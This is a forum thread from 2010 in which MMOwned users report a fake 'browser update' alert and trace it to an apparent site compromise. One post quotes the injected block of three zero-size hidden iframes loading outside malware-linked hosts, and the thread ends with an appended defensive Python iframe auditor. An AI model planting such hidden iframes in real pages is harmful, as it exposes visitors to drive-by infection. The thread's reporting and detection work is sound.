[VIRUS?] Your browser is old

  1. #1
    Danne206 (Contributor)

    [VIRUS?] Your browser is old

    DO NOT ACT WHEN YOU GET THE NOTIFICATION!!
    Close the page/tab and try again within the forum section (mmowned.com/forums/)!


    Hello.

    I was visiting MMOwned some minutes ago (INDEX, WWW.MMOWNED.COM), when I received a js:alert(). Due to the awful formatting, external website address and the suspicious message - I guessed it was something weird, sherlock huh?

    Just to be able to report this, I clicked "OK" to see where it got me. More information below.

    Alert text: GamerzExpress - Free games at your fingertips! says: "Warning! Your browser is old. please install the update"
    When: Visiting the very first page, mmowned.com. About 00:25 GMT+1
    Where it took me when clicking yes: hxxp://www.gamerzexpress.com/elenore/soc.php
    (Replaced http even though the error on that page, I don't want to eventually infect anyone.)

    SCREENSHOT: http://www.f.djs-gaming.com/mmowned.png

    Hope that I was able to help. Sorry if this was intentional.
    Last edited by Danne206; 07-11-2010 at 08:18 PM.
    Dahnniel [DOT] s [AT] gmail [DOT] com

  2. #2
    Zoidberg (Elite User)
    We already know this.

    Open your mind to reality.
    Do NOT contact me about trading section stuff. Contact a section MOD instead.

  3. #3
    hayboy1213 (Contributor)
    I got it too, I pressed OK, nothing happened, and Norton didn't catch anything.

  4. #4
    Pedregon (Contributor)
    I got this as well.
    Leecher - 08-30-2007 - Contributor - 07-23-2008
    Donator - 06-19-2009



  5. #5
    Ground Zero (★ Elder ★)
    Yes, we're aware. Do not install it; Apoc has been contacted.

  6. #6
    Danne206 (Contributor)
    Originally Posted by Zoidberg
    We already know this.
    Oh, I'm sorry. I must've missed any threads about this, but hey, just woke up so I'll blame it on that :d
    Dahnniel [DOT] s [AT] gmail [DOT] com

  7. #7
    Igzz (CoreCoins Purchaser)
    Apoc trying to h4x us!

    Nawh seriously though, I clicked cancel.


  8. #8
    soulchief (Member)
    I got it using Chrome, but I clicked cancel... Chrome automatically updated without me even knowing :P

  9. #9
    Sednogmah (Contributor)
    3 IFRAMEs have been added to the source of http://www.mmowned.com:
    Code:
    <html><body> 
    <iframe src="http://www.gamerzexpress.com" width="0" height="0" frameborder="0"></iframe>
    <iframe src="http://www.gamerzexpress.com/elenore/index.php?" width="0" height="0" frameborder="0"></iframe>
    <iframe src="http://www.darkwealth.com" width="0" height="0" frameborder="0"></iframe>
    </html></body>
    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
    It's not injected via JavaScript but either generated directly by the web server or via MITM. Proof:
    Code:
    $ wget -qO - http://www.mmowned.com |grep gamerz >/dev/null && echo "Not injected via JavaScript."
    Not injected via JavaScript.
    Is there any chance that this is related to the recent alleged MMOwned hack?

    Originally Posted by Zoidberg
    We already know this.
    Why is the site still online then?
    Last edited by Sednogmah; 07-11-2010 at 07:14 PM.
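
    Added example, not part of the original post or the site's own code: the `wget | grep` check above matches one known string, whereas this Python sketch parses the served HTML and flags any iframe that is zero-size or loads from another host, noting when it sits ahead of the page's DOCTYPE as in the response quoted above. The `audit` function, the `mmowned.com` site-host argument and the legitimate banner iframe in the sample are assumptions made for illustration.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample modelled on the response quoted in the post above: a
# hidden-iframe block prepended to the real DOCTYPE (banner iframe is made up).
SAMPLE = """<html><body>
<iframe src="http://www.gamerzexpress.com" width="0" height="0" frameborder="0"></iframe>
<iframe src="http://www.gamerzexpress.com/elenore/index.php?" width="0" height="0" frameborder="0"></iframe>
<iframe src="http://www.darkwealth.com" width="0" height="0" frameborder="0"></iframe>
</html></body>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><head><title>forum</title></head><body>
<iframe src="/ads/banner.html" width="468" height="60"></iframe>
</body></html>"""

class IframeAudit(HTMLParser):
    """Collect iframes that are invisible or load from a foreign host."""

    def __init__(self, site_host):
        super().__init__()
        self.site_host = site_host.lower()  # assumed first-party domain
        self.seen_doctype = False
        self.findings = []  # (line, src, [reasons])

    def handle_decl(self, decl):
        if decl.lower().startswith("doctype"):
            self.seen_doctype = True

    def handle_starttag(self, tag, attrs):
        if tag != "iframe":
            return
        a = dict(attrs)
        src = a.get("src") or ""
        # Relative URLs have no hostname and count as first-party.
        host = (urlparse(src).hostname or self.site_host).lower()
        reasons = []
        if a.get("width") in ("0", "0px") or a.get("height") in ("0", "0px"):
            reasons.append("zero-size")
        if host != self.site_host and not host.endswith("." + self.site_host):
            reasons.append("off-site host " + host)
        if reasons and not self.seen_doctype:
            reasons.append("before DOCTYPE")  # markup prepended to the page
        if reasons:
            self.findings.append((self.getpos()[0], src, reasons))

def audit(html, site_host):
    parser = IframeAudit(site_host)
    parser.feed(html)
    parser.close()
    return parser.findings
```

    Run against a fresh fetch of the front page on a schedule, a non-empty result is a reason to compare the served file with the copy in version control.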

  10. #10
    dw~ (Master Sergeant)
    Could be a 'virus', editing the host file to disallow permission to MMOwned and perhaps redirecting to gamerzexpress or something.

    What did I say about the site being haxed yesterday...

  11. #11
    Dombo (Banned)
    Seems to point to some "Get Rich Online" forum, called DarkWealth as has been pointed out before.

    Both the site's owners are protected, thus you can't find their real names using a simple whois lookup.

    The most important url seems to be broken though (http://www.gamerzexpress.com/elenore/index.php)

    Originally Posted by Sednogmah
    It's not injected via JavaScript but either generated directly by the web server or via MITM.
    I think it's generated by one of the sites.
    Last edited by Dombo; 07-11-2010 at 07:27 PM.

  12. #12
    soulchief (Member)
    Originally Posted by Dombo
    Seems to point to some "Get Rich Online" forum, called DarkWealth as has been pointed out before.

    Both the site's owners are protected, thus you can't find their real names using a simple whois lookup.

    The most important url seems to be broken though (http://www.gamerzexpress.com/elenore/index.php)



    I think it's generated by one of the sites.
    Site is also hosted on an offshore server, so can't get them shut down either. Gamerzexpress could be shut down though, HostGator is USA and they have warez on that site.
    Last edited by soulchief; 07-11-2010 at 07:32 PM.

  13. #13
    maclone (Authenticator enabled)
    You should be safe (for now) when you don't have Java or Adobe Reader installed.
    But don't try your luck.
    Zomfg. And no, don't ask. - Dombo did it.

  14. #14
    Sednogmah (Contributor)
    Originally Posted by maclone
    You should be safe (for now) when you don't have Java or Adobe Reader installed.
    But don't try your luck.
    Do you have any details on the problem? Both Adobe Reader & the Adobe Flash player have a long history of security flaws... but not Sun's JRE. The last JRE exploit is many months old.

    Generally it's not a bad idea to apply a whitelist approach to active web content, no matter if it's Flash, Shockwave, Java and even JavaScript. For example there's NoScript for Firefox. With that you don't have to uninstall Java, Flash or the Adobe Reader, at least not in order to stay relatively safe on the web.

    Windows XP users should beware the still unpatched help center exploit that allows attackers to run arbitrary code by crafting malicious websites: http://seclists.org/fulldisclosure/2010/Jun/205
    Last edited by Sednogmah; 07-11-2010 at 09:18 PM.

  15. #15
    Apoc (Angry Penguin)
    Alright folks, I went through the paces, going from worst, to least, security wise.

    The iframes should be gone for good. However, if you do see another one pop up, please, PLEASE let me, or another staff member know. (They know how to contact me.)

    With the size of this site, and the others, it's a bit hard to find all the possibilities that an attacker can use to gain access to the servers.

    There are now newer (and a bit 'heavier') security measures in place, so if things seem a little strange, please send me a PM.

    This will likely be users being refused from connecting to the server, etc.

    I've also done quite a few things to the servers that I really shouldn't have had to do. But it's worth it in the end.

    I do apologize for anybody who has been infected by these *******s. But I appreciate that everyone cares enough to properly report the issue, and do a little research to help everyone else. Let's hope this doesn't happen again any time soon. (We're a very large site, and one of the largest WoW sites on the net, people attacking us is going to happen. So we simply deal with it as it happens.)
